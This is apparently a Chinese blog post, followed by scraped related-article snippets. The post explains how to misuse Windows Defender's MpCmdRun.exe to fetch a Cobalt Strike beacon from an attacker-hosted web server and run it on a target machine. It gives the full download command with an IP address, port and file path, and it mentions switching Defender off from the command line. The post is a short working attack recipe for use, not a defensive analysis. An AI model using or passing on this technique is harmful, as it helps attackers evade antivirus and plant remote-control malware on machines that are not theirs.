文章前言

Windows Defender是Windows 10系列自带的一款系统保护程序,可以对系统中的恶意程序、恶意行为进行查杀,与此同时,我们可以使用Windows Defender自带的命令执行工具"MpCmdRun.exe"来实现远程下载恶意文件的目的,但是免杀好像还是不太可靠,不过我们可以在cmd中关闭Windows Defender,所以这样一来,一结合就变得有意思多了,不管在使用该思路的过程中还需要权限提升,但是CS因为在后渗透测试中有很好的辅助功能,所以总体来说还是划算的~

具体实现

Step 1:在cobaltstrike中生成恶意攻击载荷

Step 2:在攻击主机中搭建web服务托管beacon.exe程序

Step 3:在目标主机上使用Windows Defender自带的MpCmdRun.exe程序下载恶意文件

"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -DownloadFile -url http://192.168.188.129:6666/beacon.exe -path c:\\users\\resnd\\Desktop\\c-beacon.exe

Step 4:之后执行恶意文件,可以看到在CS中成功上线

MpCmdRun恶意文件下载相关推荐

  1. Windows Defender的一些渗透知识

    前言 Microsoft Defender,最初称为Microsoft AntiSpyware,是微软推出的一款杀毒软件.相信大家对Windows Defender 的防御性能还是没有怀疑的,毕竟最了 ...

  2. 恶意网站可利用浏览器扩展 API,窃取浏览器数据

    恶意网站可以利用浏览器扩展 API,在浏览器内执行代码,来窃取用户敏感信息,比如用户书签.历史浏览记录和 cookies.在这之后,攻击者可能劫持用户的登陆会话.而敏感账户像是电子邮件.社交媒体或工作 ...

  3. 发送垃圾邮件的僵尸网络——药物(多)、赌博、股票债券等广告+钓鱼邮件、恶意下载链接、勒索软件+推广加密货币、垃圾股票、色情网站(带宏的office文件、pdf等附件)...

    卡巴斯基实验室<2017年Q2垃圾邮件与网络钓鱼分析报告> 米雪儿 2017-09-07 from:http://www.freebuf.com/articles/network/1465 ...

  4. Office CVE-2017-8570 远程代码执行漏洞复现

    最近在学习kali的相关使用,朋友说不如就复现cve-2017-8570吧,我欣然答应. 0x00介绍 CVE-2017-8570是一个逻辑漏洞,成因是Microsoft PowerPoint执行时会 ...

  5. SQLite 数据库注入总结

    前言 SQLite 是一个进程内的库,实现了自给自足的.无服务器的.零配置的.事务性的 SQL 数据库引擎.它是一个零配置的数据库,这意味着与其他数据库不一样,您不需要在系统中配置.SQLite 与 ...

  6. 腾讯html5平台,腾讯浏览服务

    2. 浏览增强 传统系统内核(Webview)存在适配成本高.不安全.不稳定.耗流量.速度慢.视频播放差.文件能力差等问题,这是移动应用开发商在进行Hybrid App开发时普遍面临的难题.腾讯浏览服 ...

  7. 滲透测试ATTCK攻击模型三(Initial Access 初始访问)

    攻击者试图进入目标网络,使用目标网络对外暴露的各种入口在目标网络中获得立足点.获得初始访问立足点的技术主要包括网络钓鱼或利用对外开放的web服务上的漏洞等.攻击者在获得立足点后可进行持久化和权限提升操 ...

  8. 常见网络攻击类型的原理和危害性分析以及对应的解决措施

    1.Webshell攻击 威胁级别:高 原理:Webshell攻击就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.黑客在入侵了一个网站后,通常 ...

  9. 网络安全观察报告 漏洞观察

    漏洞利用 扫描探测 9.34% 发送垃圾邮件 6.44%传播恶意软件 1.13%web 攻击 0.72%代理 0.06% 钓鱼 0.01% 基于对这些"惯犯"的长期跟踪,我们从其攻 ...

最新文章

  1. 16. 3Sum Closest
  2. Java Jsoup库 实现天气爬取(附第三方库加载方式)
  3. c语言输入的成绩由高到低该怎么,输入成绩,按照平均分从高到低输出
  4. 高等数学下-赵立军-北京大学出版社-题解-练习10.1
  5. 删除sessionstorage_localStorage 和 sessionStorage 介绍
  6. 吴恩达发起新型竞赛范式!模型固定,只调数据?!
  7. 文本字符分析python_Python实现字符串匹配算法代码示例
  8. atoi、stoi、strtoi区别
  9. Impersonate让你的子线程也具有主线程的执行权限
  10. Windows 10 Build 9879 新变化(内含ISO下载)
  11. linux下查看系统硬件,Linux 查看系统硬件信息 Linux 查看系统硬件信息(实例详解)...
  12. 流氓软件的完全卸载的一些方法
  13. NSGA_2总结梳理附代码按行详细注解
  14. win10u盘被写保护怎么解除_win10系统下u盘被写保护怎么解除_win10解除u盘写保护方法...
  15. 计算机已从异常关机中恢复,win7系统经常遇到“windows已从异常关机中恢复”的解决方法...
  16. 【读书笔记】巴比伦富翁的理财课
  17. 达奇机器人编程学院_Wonder Workshop Dash Robot 达奇STEM编程机器人 中英文双语版
  18. 江南农村商业银行容器云平台建设经验分享
  19. 视频理解论文汇总zoo(持续ing)
  20. 【情报工具】分享15款保护隐私的搜索引擎

热门文章

  1. QCustomPlot坐标轴反向
  2. InterruptException处理方法
  3. 07 - 进程创建大盘点
  4. C语言float精解
  5. 程序员面试金典1.1
  6. vue3的几种新组件
  7. 临港新片区科技小巨人企业奖励300万元科技小巨人培育企业奖励200万元
  8. Vue源码解析-目录设计
  9. 晓羊教育获新东方、华创资本领投近1.5亿元人民币B轮融资 打造基础教育信息化大数据新生态...
  10. UnityEditor加载AssetBundle模型变为粉色